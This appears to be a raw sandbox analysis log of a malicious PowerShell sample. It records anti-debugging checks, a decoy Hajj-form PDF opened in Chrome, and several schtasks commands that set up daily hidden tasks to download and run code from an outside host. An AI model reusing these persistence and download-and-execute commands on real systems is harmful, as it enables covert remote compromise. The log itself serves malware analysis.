                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588094
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587984
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587875
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587756
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587598
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587464
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587279
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587151
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 587020
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: svchost.exe, 00000004.00000002.3381284374.0000022298E57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 00000004.00000002.3381213896.0000022298E43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWindows\System32\rasadhlp.dll
                  Source: svchost.exe, 00000004.00000002.3379757750.000002229382B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000016.00000002.2664465867.000002335C729000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2665844721.000001CCC7054000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2508079419.000001F320B9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: powershell.exe, 0000000B.00000002.2354518966.0000019FECE08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll22
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdfJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /fJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /fJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /fJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn DriversUpdate /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 11:00 /f
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn ZGraphics /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 14:00 /f
                  Source: powershell.exe, 00000016.00000002.2664465867.000002335C73B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanUI.Core.CoreWindow
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF050000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF050000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF050000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd2
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF050000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
